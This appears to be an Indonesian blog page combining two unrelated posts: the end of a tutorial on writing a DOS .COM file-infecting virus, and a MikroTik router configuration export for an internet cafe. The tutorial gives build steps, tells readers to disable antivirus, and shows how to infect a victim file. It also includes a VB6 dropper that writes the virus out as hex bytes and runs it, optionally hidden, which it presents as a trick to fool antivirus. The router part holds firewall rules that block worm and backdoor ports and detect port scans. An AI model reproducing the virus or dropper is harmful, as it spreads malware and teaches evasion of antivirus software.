db ’selamat anda berhasil membuat virus :)’,10,13
db ‘kritik dan saran eMail ke ratnozrv@yahoo.com…’,10,13
db ‘thx to Horny Toad for all the lessons u teach me :)’,10,13,’$’

target label near ; label didalam prosedur TesVirus yang berguna
; utk menetapkan jarak/besar program virus

TesVirus endp ; akhir procedure

draggy ends ; akhir segmen

end mulai ; akhir mulai (mulai = kode pertama yg dieksekusi
; komputer yang berada didalam segmen draggy)

— 02 // Note ———————————————————–

01. Compile dengan menggunakan TASM 2.01 dan Tlink

02. Untuk lebih jelasnya, anda bisa mencari referensi lain tentang
bahasa assembly

03. Untuk melihat daftar interrupt lengkap anda bisa ke Ralph Brown’s
website alamatnya di :
http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/
download: Interrupt 61a,61b,61c,61d,61e,61f (semuanya dalam Zip)

— 03 // Mengcompile —————————————————-

01. Matikan/disable fungsi Auto Protect dari program AntiVirus yang anda
gunakan karena virus yang dibuat ini termasuk ’simple virus’ sehingga
virus ini mudah didetect oleh program AntiVirus.

02. Salin program TASM dan TLINK ke folder C:\LAB

03. Salin source code TESVIRUS ke dalam text editor.

04. Simpan dengan nama yang disukai dengan ekstensi ASM. Contoh:
TESVIRUS.ASM

05. Buat batchfile bikinvirus pada folder C:\LAB

@ECHO OFF
TASM %1.ASM
TLINK /T %1.OBJ
del %1.map
del %1.obj

06. Jalankan DOS. Start -> Run -> cmd

07. Pindah ke direktori C:\LAB dan jalankan perintah bikinvirus

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\LAB>bikinvirus TESVIRUS

Turbo Assembler Version 2.01 Copyright (c) 1988, 1990
Borland International

Assembling file: TESVIRUS.ASM
Error messages: None
Warning messages: None
Passes: 1
Remaining memory: 442k

Turbo Link Version 3.01 Copyright (c) 1987, 1990 Borland
International

08. Program TESVIRUS telah dibuat. Jika ada kesalahan periksa
kembali kesalahan penulisan pada kode program, batchfile,
atau perintah di DOS.

— 04 // Testing ——————————————————–

Setelah anda berhasil membuat program virus bernama TESVIRUS.COM,
tentunya anda ingin menguji apakah virus yang telah dibuat
berhasil atau tidak. Anda tak perlu khawatir dengan virus yang
telah dibuat tadi karena virus ini tidak akan merusak sistem
di komputer anda selama anda tidak menempatkan virus ini difolder
Windows atau system atau system32.

Untuk menguji virus TESVIRUS.COM terlebih dahulu anda harus
membuat satu ’simple’ program .com yang tidak berguna [contoh
KORBAN.COM] kemudian catat ukuran asli dari file KORBAN.COM,
setelah itu letakkan program KORBAN.COM tersebut ke folder C:\LAB.

Masuk ke DOS prompt dan jalankan program TESVIRUS.

Kemudian, bandingkan size program KORBAN.COM sebelum dan sesudah
program TESVIRUS dijalankan. Jika terjadi perubahan maka TESVIRUS
telah berhasil menjalankan tugasnya.

Jika anda bingung bagaimana membuat sebuah program KORBAN.COM disini
penulis menyertakan source code untuk program tersebut dan akan
dicompile dengan menggunakan program debug.exe.

Program ini hanyalah sebuah program untuk menampilkan huruf “AA” jika
dijalankan dengan ukuran file aslinya = 14 KB.

Setelah anda mengcopy program debug.exe ke folder C:\LAB, jalankan
text editor dan copy-kan source code dibawah ini:

N KORBAN.COM
E 0100 B4 02 B2 41 CD 21 B4 02 B2 41 CD 21 CD 20
RCX
000E
W
Q

Masuk ke dalam DOS prompt dan compile

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\LAB>debug

— 05 // Mengatasi TESVIRUS.COM —————————————–

– Delete program TESVIRUS.COM termasuk file KORBAN.COM (yang sudah
terinfeksi).

– Jika belum bisa hilang, enable kembali auto protect program
AntiVirus anda kemudian scan dan quarantine, setelah itu anda
dapat men-delete TESVIRUS.COM dari dialog quarantine / delete
– Jika masih belum bisa anda dapat me-reverse/membalikkan logika dari
program TESVIRUS.COM untuk membersihkan file-file yang telah
terinfeksi.

— 06 // Tip dan Trik Membuat Virus Generator —————————

Ini adalah hasil iseng penulis waktu lagi menulis program dan
ternyata dengan menggunakan cara ini kita dapat mengecoh program
AntiVirus. Triknya adalah dengan membuat suatu program yang
men-drop/membuat file .dbg, .bat kesebuah drive dikomputer
kemudian program menjalankan file .bat yang telah dihasilkan
tadi untuk membuat program .com(virus) di drive tersebut.
Setelah program melaksanakan tugasnya maka file .dbg akan otomatis
dihapus dari komputer.

Disini penulis tidak akan membahas tentang cara bekerja dengan
menggunakan VB, untuk lebih jelasnya anda dapat membaca referensi
VB 6.0 dari buku, artikel atau anda dapat membeli CD MSDN yang
berisi Help dan contoh program pada VB 6.0 [keep up the hard
work my friend :)]

Pada program yang akan dibahas ini file yang akan dihasilkan/
di-drop ke drive C:\ adalah file tv.dbg, tv.bat dan TESVIRUS.com.
Program ini di-compile menggunakan VB 6.0 jadi sebelumnya anda
harus menginstall VB 6.0 dikomputer anda 🙂

Virus yang akan dihasilkan adalah virus TESVIRUS.COM yaitu virus
yang sama dengan virus yang telah anda buat diatas, perbedaannya
adalah program ini akan terus menghasilkan virus TESVIRUS.COM
di drive C:\ jika program ini dijalankan.

Terlebih dahulu anda memilih tipe ’standard exe’ di VB dan
Add 1 module pada program VB.

Salin code berikut pada text editor VB.

‘ kode di module
Public Function DropVir()
On Error Resume Next
Dim x, tvBat As String
x = “C:\tv.dbg”
Open x For Output As #1
Print #1, “N C:\TESVIRUS.COM”
Print #1, “E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E”
Print #1, “E 0110 00 CD 21 93 B4 40 B9 EA 00 BA 00 01 CD 21 B4 3E”
Print #1, “E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A”
Print #1, “E 0130 2E 63 6F 6D 00 73 65 6D 75 61 20 66 69 6C 65 20?
Print #1, “E 0140 2A 2E 63 6F 6D 20 64 69 20 64 69 72 65 6B 74 6F”
Print #1, “E 0150 72 69 20 69 6E 69 20 73 75 64 61 68 20 64 69 69?
Print #1, “E 0160 6E 66 65 6B 73 69 0A 0D 73 65 6C 61 6D 61 74 20?
Print #1, “E 0170 65 6C 6F 20 62 65 72 68 61 73 69 6C 20 62 69 6B”
Print #1, “E 0180 69 6E 20 76 69 72 75 73 20 70 65 72 74 61 6D 61?
Print #1, “E 0190 20 6B 61 6D 75 20 3A 29 0A 0D 6B 72 69 74 69 6B”
Print #1, “E 01A0 20 64 61 6E 20 73 61 72 61 6E 20 65 4D 61 69 6C”
Print #1, “E 01B0 20 6B 65 20 64 52 34 47 47 79 40 79 61 68 6F 6F”
Print #1, “E 01C0 2E 63 6F 6D 2E 2E 2E 0A 0D 54 65 73 56 69 72 75?
Print #1, “E 01D0 73 20 54 72 69 76 69 61 4C 20 2D 20 64 52 34 47?
Print #1, “E 01E0 47 79 20 2D 20 30 34 0A 0D 24?
Print #1, “RCX”
Print #1, “00EA”
Print #1, “W”
Print #1, “Q”
Close #1
tvBat = “C:\tvBat.bat”
Open tvBat For Output As #1
Print #1, “@echo off”
Print #1, “debug < C:\tv.dbg”
Print #1, “del C:\tv.dbg”
Close #1
Shell “C:\tvBat.bat”, vbNormalFocus ‘ atau gunakan vbHide agar
‘ proses dilakukan secara
‘ background
End Function

‘ kode di form
Private Sub Form_Load()
Call DropVir
Unload Me
End Sub

Setelah itu compile program anda dan jalankan, jika berhasil maka
sekarang di drive C: akan muncul program TESVIRUS.com. Karena
program ini dibuat dengan cepat jadi ada beberapa kekurangannya
seperti program ini tidak mencek kembali apakah file TESVIRUS.COM
telah ada di drive C:\, untuk itu anda mungkin dapat menambahkan
fungsi ‘FileExists’ untuk mencek file tersebut atau anda dapat
berkreasi sendiri dengan menggunakan cara anda sendiri untuk berkreasi
seperti men-drop virus ke folder C:\Windows\System32

— 07 // Final Word —————————————————–

“ilmu itu bukan untuk dibaca tapi untuk dipraktekkan.”

“jangan takut untuk mencoba, trial n’ error is the best lessons
in the world”

Happy programming n’ bye …

Konfigurasi warnet speedy dengan mikrotik dan LinuxPro

•April 29, 2009 • Tinggalkan sebuah Komentar

Konfigurasi Warnet Spedy pakai MIkx+LinuxProx
Konfigurasi ini menggunakan modem 4 port Dlink dan settingnya seperti berikut :
192.168.1.1
|
modem —–192.168.1.3 Proxy -> GW ke Modem yaitu 192.168.1.1
|
|MIkrotik 192.168.1.2 Mikrotik –>> GW ke Modem Yaitu 192.168.1.1
|
192.168.0.254 —HUb —-LAN
Management BW
1. Konfig Mikrotinya :
MMM MMM KKK TTTTTTTTTTT KKK
MMMM MMMM KKK TTTTTTTTTTT KKK
MMM MMMM MMM III KKK KKK RRRRRR OOOOOO TTT III KKK KKK
MMM MM MMM III KKKKK RRR RRR OOO OOO TTT III KKKKK
MMM MMM III KKK KKK RRRRRR OOO OOO TTT III KKK KKK
MMM MMM III KKK KKK RRR RRR OOOOOO TTT III KKK KKK
MikroTik RouterOS 2.9.27 (c) 1999-2006 http://www.mikrotik.com/
Terminal vt102 detected, using multiline input mode
[admin@MikroTik] > export
# may/20/2007 02:41:49 by RouterOS 2.9.27
# software id = JI4S-NSN
#
/ interface ethernet
set Public name=”Public” mtu=1500 mac-address=00:15:E9:EF:86:FE arp=enabled disable-running-check=yes auto-negotiation=yes \
full-duplex=yes cable-settings=default speed=100Mbps comment=”” disabled=no
set Lan name=”Lan” mtu=1500 mac-address=00:01:02:97:D0:BE arp=enabled disable-running-check=yes auto-negotiation=yes \
full-duplex=yes cable-settings=default speed=100Mbps comment=”” disabled=no
/ interface wireless security-profiles
set default name=”default” mode=none authentication-types=”” unicast-ciphers=”” group-ciphers=”” wpa-pre-shared-key=”” \
wpa2-pre-shared-key=”” eap-methods=passthrough tls-mode=no-certificates tls-certificate=none static-algo-0=none \
static-key-0=”” static-algo-1=none static-key-1=”” static-algo-2=none static-key-2=”” static-algo-3=none \
static-key-3=”” static-transmit-key=key-0 static-sta-private-algo=none static-sta-private-key=”” \
radius-mac-authentication=no group-key-update=5m
/ interface wireless align
set frame-size=300 active-mode=yes receive-all=no audio-monitor=00:00:00:00:00:00 filter-mac=00:00:00:00:00:00 ssid-all=no \
frames-per-second=25 audio-min=-100 audio-max=-20
/ interface wireless snooper
set multiple-channels=yes channel-time=200ms receive-errors=no
/ interface wireless sniffer
set multiple-channels=no channel-time=200ms only-headers=no receive-errors=no memory-limit=10 file-name=”” file-limit=10 \
streaming-enabled=no streaming-server=0.0.0.0 streaming-max-rate=0
/ interface l2tp-server server
set enabled=no max-mtu=1460 max-mru=1460 authentication=pap,chap,mschap1,mschap2 default-profile=default-encryption
/ interface pptp-server server
set enabled=no max-mtu=1460 max-mru=1460 authentication=mschap1,mschap2 keepalive-timeout=30 \
default-profile=default-encryption
/ ip pool
add name=”dhcp_pool1″ ranges=192.168.0.1-192.168.0.30
/ ip telephony region
/ ip telephony gatekeeper
set gatekeeper=none remote-id=”” remote-address=0.0.0.0
/ ip telephony aaa
set use-radius-accounting=no interim-update=0s
/ ip telephony codec
move G.711-uLaw-64k/sw
move G.711-ALaw-64k/sw
move G.729A-8k/sw
move G.729-8k/sw
move G.723.1-6.3k/sw
move GSM-06.10-13.2k/sw
move LPC-10-2.5k/sw
/ ip accounting
set enabled=no account-local-traffic=no threshold=256
/ ip accounting web-access
set accessible-via-web=no address=0.0.0.0/0
/ ip service
set telnet port=23 address=0.0.0.0/0 disabled=no
set ftp port=21 address=0.0.0.0/0 disabled=no
set www port=80 address=0.0.0.0/0 disabled=no
set ssh port=22 address=0.0.0.0/0 disabled=no
set www-ssl port=443 address=0.0.0.0/0 certificate=none disabled=yes
/ ip upnp
set enabled=no allow-disable-external-interface=yes show-dummy-rule=yes
/ ip arp
/ ip socks
set enabled=no port=1080 connection-idle-timeout=2m max-connections=200
/ ip dns
set primary-dns=203.130.193.74 secondary-dns=202.134.0.155 allow-remote-requests=yes cache-size=2048KiB cache-max-ttl=1w
/ ip traffic-flow
set enabled=no interfaces=all cache-entries=4k active-flow-timeout=30m inactive-flow-timeout=15s
/ ip address
add address=192.168.1.2/24 network=192.168.1.0 broadcast=192.168.1.255 interface=Public comment=”” disabled=no
add address=192.168.0.254/24 network=192.168.0.0 broadcast=192.168.0.255 interface=Lan comment=”” disabled=no
/ ip proxy
set enabled=no port=8080 parent-proxy=0.0.0.0:0 maximal-client-connecions=1000 maximal-server-connectons=1000
/ ip proxy access
add dst-port=23-25 action=deny comment=”block telnet & spam e-mail relaying” disabled=no
/ ip neighbor discovery
set Public discover=yes
set Lan discover=yes
/ ip route
add dst-address=0.0.0.0/0 gateway=192.168.1.1 scope=255 target-scope=10 comment=”” disabled=no
/ ip firewall mangle
add chain=prerouting protocol=tcp dst-port=80 action=mark-connection new-connection-mark=http_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=443 action=mark-connection new-connection-mark=http_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=3128 action=mark-connection new-connection-mark=http_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=8080 action=mark-connection new-connection-mark=http_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=53 action=mark-connection new-connection-mark=dns_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=udp dst-port=53 action=mark-connection new-connection-mark=dns_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=5050-5061 action=mark-connection new-connection-mark=ym_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=udp dst-port=27015 action=mark-connection new-connection-mark=cs_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=6000-7000 action=mark-connection new-connection-mark=irc_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=8291 action=mark-connection new-connection-mark=mt_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=110 action=mark-connection new-connection-mark=email_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=25 action=mark-connection new-connection-mark=email_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting protocol=tcp dst-port=22 action=mark-connection new-connection-mark=ssh_conn passthrough=yes \
comment=”” disabled=no
add chain=prerouting connection-mark=http_conn action=mark-packet new-packet-mark=http passthrough=no comment=”” \
disabled=no
add chain=prerouting connection-mark=dns_conn action=mark-packet new-packet-mark=dns passthrough=no comment=”” disabled=no
add chain=prerouting connection-mark=ym_conn action=mark-packet new-packet-mark=ym passthrough=no comment=”” disabled=no
add chain=prerouting connection-mark=cs_conn action=mark-packet new-packet-mark=cs passthrough=no comment=”” disabled=no
add chain=prerouting connection-mark=irc_conn action=mark-packet new-packet-mark=irc passthrough=no comment=”” disabled=no
add chain=prerouting connection-mark=mt_conn action=mark-packet new-packet-mark=mt passthrough=no comment=”” disabled=no
add chain=prerouting connection-mark=email_conn action=mark-packet new-packet-mark=email passthrough=no comment=”” \
disabled=no
add chain=prerouting connection-mark=ssh_conn action=mark-packet new-packet-mark=ssh passthrough=no comment=”” disabled=no
add chain=prerouting src-address=192.168.0.0/24 action=mark-packet new-packet-mark=test-up passthrough=no comment=”UP \
TRAFFIC” disabled=no
add chain=forward src-address=192.168.1.0/29 action=mark-connection new-connection-mark=test-conn passthrough=yes \
comment=”CONN-MARK” disabled=no
add chain=forward in-interface=Public connection-mark=test-conn action=mark-packet new-packet-mark=test-down \
passthrough=no comment=” DOWN-DIRECT CONNECTION” disabled=no
add chain=forward in-interface=Public src-address=192.168.1.0/24 action=mark-connection new-connection-mark=test-conn \
passthrough=yes comment=”” disabled=no
add chain=output out-interface=Lan dst-address=192.168.0.0/24 action=mark-packet new-packet-mark=test-down passthrough=no \
comment=”DOWN-VIA PROXY” disabled=no
/ ip firewall nat
add chain=srcnat out-interface=Public action=masquerade comment=”” disabled=no
add chain=dstnat protocol=tcp dst-port=80 action=dst-nat to-addresses=192.168.1.3 to-ports=8080 comment=”” disabled=no
add chain=dstnat protocol=tcp dst-port=8080 action=dst-nat to-addresses=192.168.1.3 to-ports=3128 comment=”” disabled=no
add chain=dstnat protocol=tcp dst-port=3128 action=dst-nat to-addresses=192.168.1.3 to-ports=8080 comment=”” disabled=no
add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080 comment=”” disabled=yes
add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080 comment=”” disabled=yes
add chain=dstnat protocol=tcp dst-port=8080 action=redirect to-ports=8080 comment=”” disabled=yes
/ ip firewall connection tracking
set enabled=yes tcp-syn-sent-timeout=5s tcp-syn-received-timeout=5s tcp-established-timeout=1d tcp-fin-wait-timeout=10s \
tcp-close-wait-timeout=10s tcp-last-ack-timeout=10s tcp-time-wait-timeout=10s tcp-close-timeout=10s udp-timeout=10s \
udp-stream-timeout=3m icmp-timeout=10s generic-timeout=10m tcp-syncookie=no
/ ip firewall filter
add chain=input connection-state=invalid action=drop comment=”Drop invalid connections” disabled=no
add chain=input connection-state=established action=accept comment=”Allow esatblished connections” disabled=no
add chain=input connection-state=related action=accept comment=”Allow related connections” disabled=no
add chain=input protocol=udp action=accept comment=”Allow UDP” disabled=no
add chain=input protocol=icmp action=accept comment=”Allow ICMP” disabled=no
add chain=input in-interface=!Public action=accept comment=”Allow connection to router from local network” disabled=no
add chain=input action=drop comment=”Drop everything else” disabled=no
add chain=input protocol=tcp dst-port=1337 action=add-src-to-address-list address-list=knock address-list-timeout=15s \
comment=”” disabled=no
add chain=input protocol=tcp dst-port=7331 src-address-list=knock action=add-src-to-address-list address-list=safe \
address-list-timeout=15m comment=”” disabled=no
add chain=input connection-state=established action=accept comment=”accept established connection packets” disabled=no
add chain=input connection-state=related action=accept comment=”accept related connection packets” disabled=no
add chain=input connection-state=invalid action=drop comment=”drop invalid packets” disabled=no
add chain=input protocol=tcp psd=21,3s,3,1 action=drop comment=”detect and drop port scan connections” disabled=no
add chain=input protocol=tcp connection-limit=3,32 src-address-list=black_list action=tarpit comment=”suppress DoS attack” \
disabled=no
add chain=input protocol=tcp connection-limit=10,32 action=add-src-to-address-list address-list=black_list \
address-list-timeout=1d comment=”detect DoS attack” disabled=no
add chain=input protocol=icmp action=jump jump-target=ICMP comment=”jump to chain ICMP” disabled=no
add chain=input action=jump jump-target=services comment=”jump to chain services” disabled=no
add chain=input dst-address-type=broadcast action=accept comment=”Allow Broadcast Traffic” disabled=no
add chain=input action=log log-prefix=”Filter:” comment=”” disabled=no
add chain=input action=accept comment=”Allow access to router from known network” disabled=no
add chain=input src-address=192.168.0.0/24 action=accept comment=”” disabled=no
add chain=input src-address=192.168.1.0/24 action=accept comment=”” disabled=no
add chain=input action=drop comment=”drop everything else” disabled=no
add chain=ICMP protocol=icmp icmp-options=0:0-255 limit=5,5 action=accept comment=”0:0 and limit for 5pac/s” disabled=no
add chain=ICMP protocol=icmp icmp-options=3:3 limit=5,5 action=accept comment=”3:3 and limit for 5pac/s” disabled=no
add chain=ICMP protocol=icmp icmp-options=3:4 limit=5,5 action=accept comment=”3:4 and limit for 5pac/s” disabled=no
add chain=ICMP protocol=icmp icmp-options=8:0-255 limit=5,5 action=accept comment=”8:0 and limit for 5pac/s” disabled=no
add chain=ICMP protocol=icmp icmp-options=11:0-255 limit=5,5 action=accept comment=”11:0 and limit for 5pac/s” disabled=no
add chain=ICMP protocol=icmp action=drop comment=”Drop everything else” disabled=no
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w comment=”Port scanners to list ” disabled=no
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port \
scanners” address-list-timeout=2w comment=”NMAP FIN Stealth scan” disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w comment=”SYN/FIN scan” disabled=no
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w comment=”SYN/RST scan” disabled=no
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list=”port \
scanners” address-list-timeout=2w comment=”FIN/PSH/URG scan” disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w comment=”ALL/ALL scan” disabled=no
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port \
scanners” address-list-timeout=2w comment=”NMAP NULL scan” disabled=no
add chain=input src-address-list=”port scanners” action=drop comment=”dropping port scanners” disabled=no
add chain=forward connection-state=established action=accept comment=”allow established connections” disabled=no
add chain=forward connection-state=related action=accept comment=”allow related connections” disabled=no
add chain=forward connection-state=invalid action=drop comment=”drop invalid connections” disabled=no
add chain=virus protocol=tcp dst-port=135-139 action=drop comment=”Drop Blaster Worm” disabled=no
add chain=virus protocol=udp dst-port=135-139 action=drop comment=”Drop Messenger Worm” disabled=no
add chain=virus protocol=tcp dst-port=445 action=drop comment=”Drop Blaster Worm” disabled=no
add chain=virus protocol=udp dst-port=445 action=drop comment=”Drop Blaster Worm” disabled=no
add chain=virus protocol=tcp dst-port=593 action=drop comment=”________” disabled=no
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment=”________” disabled=no
add chain=virus protocol=tcp dst-port=1080 action=drop comment=”Drop MyDoom” disabled=no
add chain=virus protocol=tcp dst-port=1214 action=drop comment=”________” disabled=no
add chain=virus protocol=tcp dst-port=1363 action=drop comment=”ndm requester” disabled=no
add chain=virus protocol=tcp dst-port=1364 action=drop comment=”ndm server” disabled=no
add chain=virus protocol=tcp dst-port=1368 action=drop comment=”screen cast” disabled=no
add chain=virus protocol=tcp dst-port=1373 action=drop comment=”hromgrafx” disabled=no
add chain=virus protocol=tcp dst-port=1377 action=drop comment=”cichlid” disabled=no
add chain=virus protocol=tcp dst-port=1433-1434 action=drop comment=”Worm” disabled=no
add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Bagle Virus” disabled=no
add chain=virus protocol=tcp dst-port=2283 action=drop comment=”Drop Dumaru.Y” disabled=no
add chain=virus protocol=tcp dst-port=2535 action=drop comment=”Drop Beagle” disabled=no
add chain=virus protocol=tcp dst-port=2745 action=drop comment=”Drop Beagle.C-K” disabled=no
add chain=virus protocol=tcp dst-port=3127 action=drop comment=”Drop MyDoom” disabled=no
add chain=virus protocol=tcp dst-port=3410 action=drop comment=”Drop Backdoor OptixPro” disabled=no
add chain=virus protocol=tcp dst-port=4444 action=drop comment=”Worm” disabled=no
add chain=virus protocol=udp dst-port=4444 action=drop comment=”Worm” disabled=no
add chain=virus protocol=tcp dst-port=5554 action=drop comment=”Drop Sasser” disabled=no
add chain=virus protocol=tcp dst-port=8866 action=drop comment=”Drop Beagle.B” disabled=no
add chain=virus protocol=tcp dst-port=9898 action=drop comment=”Drop Dabber.A-B” disabled=no
add chain=virus protocol=tcp dst-port=10000 action=drop comment=”Drop Dumaru.Y” disabled=no
add chain=virus protocol=tcp dst-port=10080 action=drop comment=”Drop MyDoom.B” disabled=no
add chain=virus protocol=tcp dst-port=12345 action=drop comment=”Drop NetBus” disabled=no
add chain=virus protocol=tcp dst-port=17300 action=drop comment=”Drop Kuang2″ disabled=no
add chain=virus protocol=tcp dst-port=27374 action=drop comment=”Drop SubSeven” disabled=no
add chain=virus protocol=tcp dst-port=65506 action=drop comment=”Drop PhatBot, Agobot, Gaobot” disabled=no
add chain=forward action=jump jump-target=virus comment=”jump to the virus chain” disabled=no
add chain=input connection-state=invalid action=drop comment=”Drop Invalid connections” disabled=no
add chain=input connection-state=established action=accept comment=”Allow Established connections” disabled=no
add chain=input protocol=udp action=accept comment=”Allow UDP” disabled=no
add chain=input protocol=icmp action=accept comment=”Allow ICMP” disabled=no
add chain=input src-address=192.168.0.0/24 action=accept comment=”Allow access to router from known network” disabled=no
add chain=input src-address=63.219.6.0/24 action=accept comment=”” disabled=no
add chain=input src-address=125.0.0.0/8 action=accept comment=”” disabled=no
add chain=input action=drop comment=”Drop anything else” disabled=no
add chain=forward protocol=tcp connection-state=invalid action=drop comment=”drop invalid connections” disabled=no
add chain=forward connection-state=established action=accept comment=”allow already established connections” disabled=no
add chain=forward connection-state=related action=accept comment=”allow related connections” disabled=no
add chain=forward src-address=0.0.0.0/8 action=drop comment=”” disabled=no
add chain=forward dst-address=0.0.0.0/8 action=drop comment=”” disabled=no
add chain=forward src-address=127.0.0.0/8 action=drop comment=”” disabled=no
add chain=forward dst-address=127.0.0.0/8 action=drop comment=”” disabled=no
add chain=forward src-address=224.0.0.0/3 action=drop comment=”” disabled=no
add chain=forward dst-address=224.0.0.0/3 action=drop comment=”” disabled=no
add chain=forward protocol=tcp action=jump jump-target=tcp comment=”” disabled=no
add chain=forward protocol=udp action=jump jump-target=udp comment=”” disabled=no
add chain=forward protocol=icmp action=jump jump-target=icmp comment=”” disabled=no
add chain=tcp protocol=tcp dst-port=69 action=drop comment=”deny TFTP” disabled=no
add chain=tcp protocol=tcp dst-port=111 action=drop comment=”deny RPC portmapper” disabled=no
add chain=tcp protocol=tcp dst-port=135 action=drop comment=”deny RPC portmapper” disabled=no
add chain=tcp protocol=tcp dst-port=137-139 action=drop comment=”deny NBT” disabled=no
add chain=tcp protocol=tcp dst-port=445 action=drop comment=”deny cifs” disabled=no
add chain=tcp protocol=tcp dst-port=2049 action=drop comment=”deny NFS” disabled=no
add chain=tcp protocol=tcp dst-port=12345-12346 action=drop comment=”deny NetBus” disabled=no
add chain=tcp protocol=tcp dst-port=20034 action=drop comment=”deny NetBus” disabled=no
add chain=tcp protocol=tcp dst-port=3133 action=drop comment=”deny BackOriffice” disabled=no
add chain=tcp protocol=tcp dst-port=67-68 action=drop comment=”deny DHCP” disabled=no
add chain=udp protocol=udp dst-port=69 action=drop comment=”deny TFTP” disabled=no
add chain=udp protocol=udp dst-port=111 action=drop comment=”deny PRC portmapper” disabled=no
add chain=udp protocol=udp dst-port=135 action=drop comment=”deny PRC portmapper” disabled=no
add chain=udp protocol=udp dst-port=137-139 action=drop comment=”deny NBT” disabled=no
add chain=udp protocol=udp dst-port=2049 action=drop comment=”deny NFS” disabled=no
add chain=udp protocol=udp dst-port=3133 action=drop comment=”deny BackOriffice” disabled=no
add chain=icmp protocol=icmp icmp-options=0:0 action=accept comment=”drop invalid connections” disabled=no
add chain=icmp protocol=icmp icmp-options=3:0 action=accept comment=”allow established connections” disabled=no
add chain=icmp protocol=icmp icmp-options=3:1 action=accept comment=”allow already established connections” disabled=no
add chain=icmp protocol=icmp icmp-options=4:0 action=accept comment=”allow source quench” disabled=no
add chain=icmp protocol=icmp icmp-options=8:0 action=accept comment=”allow echo request” disabled=no
add chain=icmp protocol=icmp icmp-options=11:0 action=accept comment=”allow time exceed” disabled=no
add chain=icmp protocol=icmp icmp-options=12:0 action=accept comment=”allow parameter bad” disabled=no
add chain=icmp action=drop comment=”deny all other types” disabled=no
/ ip firewall service-port
set ftp ports=21 disabled=no
set tftp ports=69 disabled=yes
set irc ports=6667 disabled=no
set h323 disabled=yes
set quake3 disabled=yes
set gre disabled=yes
set pptp disabled=yes
/ ip hotspot service-port
set ftp ports=21 disabled=no
/ ip hotspot profile
set default name=”default” hotspot-address=0.0.0.0 dns-name=”” html-directory=hotspot rate-limit=”” http-proxy=0.0.0.0:0 \
smtp-server=0.0.0.0 login-by=cookie,http-chap http-cookie-lifetime=3d split-user-domain=no use-radius=no
/ ip hotspot user profile
set default name=”default” idle-timeout=none keepalive-timeout=2m status-autorefresh=1m shared-users=1 \
transparent-proxy=yes open-status-page=always advertise=no
/ ip dhcp-server
add name=”dhcp1″ interface=Lan lease-time=3d address-pool=dhcp_pool1 bootp-support=static add-arp=yes \
authoritative=after-2sec-delay disabled=no
/ ip dhcp-server config
set store-leases-disk=5m
/ ip dhcp-server lease
add address=192.168.0.1 mac-address=00:13:D3:E4:FA:52 client-id=”1:0:13:d3:e4:fa:52″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.2 mac-address=00:13:D3:FD:36:98 client-id=”1:0:13:d3:fd:36:98″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.3 mac-address=00:13:D3:E4:FA:9D client-id=”1:0:13:d3:e4:fa:9d” server=dhcp1 comment=”” disabled=no
add address=192.168.0.4 mac-address=00:13:D3:FD:02:7E client-id=”1:0:13:d3:fd:2:7e” server=dhcp1 comment=”” disabled=no
add address=192.168.0.5 mac-address=00:13:D3:E4:FA:30 client-id=”1:0:13:d3:e4:fa:30″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.6 mac-address=00:13:D3:FD:36:61 client-id=”1:0:13:d3:fd:36:61″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.11 mac-address=00:18:F3:43:D4:66 client-id=”1:0:18:f3:43:d4:66″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.10 mac-address=00:13:D3:FD:37:BA client-id=”1:0:13:d3:fd:37:ba” server=dhcp1 comment=”” disabled=no
add address=192.168.0.9 mac-address=00:13:D3:C9:E7:C1 client-id=”1:0:13:d3:c9:e7:c1″ server=dhcp1 comment=”” disabled=no
add address=192.168.0.8 mac-address=00:13:D3:FD:36:6A client-id=”1:0:13:d3:fd:36:6a” server=dhcp1 comment=”” disabled=no
add address=192.168.0.7 mac-address=00:13:D3:E4:FA:2A client-id=”1:0:13:d3:e4:fa:2a” server=dhcp1 comment=”” disabled=no
/ ip dhcp-server network
add address=192.168.0.0/24 gateway=192.168.0.254 dns-server=192.168.0.254,202.134.0.155,203.130.193.74 comment=””
/ ip ipsec proposal
